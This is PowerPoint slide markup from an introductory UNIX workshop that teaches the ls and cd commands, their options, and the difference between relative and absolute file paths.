          <p:cNvPr id="5" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1546485" y="4358390"/>
            <a:ext cx="5712220" cy="1713666"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2308829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1.2: </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>List Directory Contents (ls)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="266700" y="1825625"/>
            <a:ext cx="8763000" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ls</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> has multiple </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0"/>
              <a:t>options</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Some useful options:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	–a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>: display “all” files, including ones normally hidden</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	–l</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>: display the “long format” listing of the files; 			gives you additional information about files in the 		form:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>permissions			#_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>of_links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owner_name</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group_name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file_size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date_last_modified</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file/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>directory_name</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-R</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>: display files “Recursively” – displays files within folders</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	-S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>: display files ordered by “Size”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Example:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1866900" y="5457746"/>
            <a:ext cx="5410200" cy="1323975"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3063054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sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="628649" y="1825625"/>
            <a:ext cx="8148091" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Command: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>cd [directory]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>What does it do:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>	Moves you to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[directory]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Example:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1476180" y="4001294"/>
            <a:ext cx="6453028" cy="2373912"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2393674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sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="628649" y="1825625"/>
            <a:ext cx="8148091" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Special versions:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>cd .. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>: Moves you up one folder level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>cd ~ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>: Moves you to your home directory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Examples:</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2277708" y="3127101"/>
            <a:ext cx="4849972" cy="1748385"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2277708" y="4965426"/>
            <a:ext cx="4849972" cy="1783455"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="301750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pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Introduction/Background/Shameless Plug for BCBGSO</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>What is BCBGSO?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Materials</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>What is UNIX and why learn it?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Lesson 0: Background/Getting Started</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Lesson 1: Moving Around the File System</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Lesson 2: Making Folders and Files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Lesson 3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>: Moving Things Around</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Lesson 4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>: Finding Things and Permissions</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Lesson 5: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Continuing Education</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1320778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pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect t="25356"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1777896" y="2106118"/>
            <a:ext cx="5753100" cy="3938821"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="8" name="Straight Arrow Connector 7"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1454046" y="5104151"/>
            <a:ext cx="2660754" cy="60710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2387" y="4934874"/>
            <a:ext cx="1708879" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>We are HERE:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6265889" y="622092"/>
            <a:ext cx="2619031" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>How would you give directions to someone located here?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="5" name="Straight Arrow Connector 4"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6400800" y="1545422"/>
            <a:ext cx="541020" cy="877738"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="47625">
            <a:solidFill>
              <a:srgbClr val="2308E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460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pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect t="25356"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1777896" y="2106118"/>
            <a:ext cx="5753100" cy="3938821"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="8" name="Straight Arrow Connector 7"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1454046" y="5104151"/>
            <a:ext cx="2660754" cy="60710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7396" y="4934874"/>
            <a:ext cx="1708879" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>We are HERE:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6342089" y="6460368"/>
            <a:ext cx="2619031" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>How about here?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="5" name="Straight Arrow Connector 4"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="6286500" y="5711253"/>
            <a:ext cx="982980" cy="749115"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="47625">
            <a:solidFill>
              <a:srgbClr val="2308E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004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pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect t="25356"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1777896" y="2106118"/>
            <a:ext cx="5753100" cy="3938821"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="8" name="Straight Arrow Connector 7"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1454046" y="5104151"/>
            <a:ext cx="2660754" cy="60710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4262269"/>
            <a:ext cx="1708879" cy="1077218"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>The address for this building is:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" dirty="0"/>
              <a:t>2415 OSBORN DR</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="pt-BR" sz="1600" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" dirty="0"/>
              <a:t>AMES, IA 50011</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="841677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sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="628649" y="1825625"/>
            <a:ext cx="8148091" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Relative vs Absolute </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>Filepaths</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0"/>
              <a:t>relative </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>path is the path to a file/directory from where you currently are (your present working directory); a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0"/>
              <a:t>relative</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> path will change depending on where you are currently </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>located</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>An </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0"/>
              <a:t>absolute</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> path is the “address” of where a file/directory is; an absolute path is “true” regardless of your present working directory, and will not change unless the file/directory is moved</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16883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1.3:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Change Directory</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="628650" y="1825624"/>
            <a:ext cx="7886700" cy="5032376"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>You can change from a directory to its subdirectory by using its </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0"/>
              <a:t>relative</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> file path</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>You can change from one directory directly to another directory by giving its </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0" smtClean="0"/>
              <a:t>absolute</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> file path</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2819400" y="2261407"/>
            <a:ext cx="3505200" cy="1285875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2490787" y="4448878"/>
            <a:ext cx="4162425" cy="1743075"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
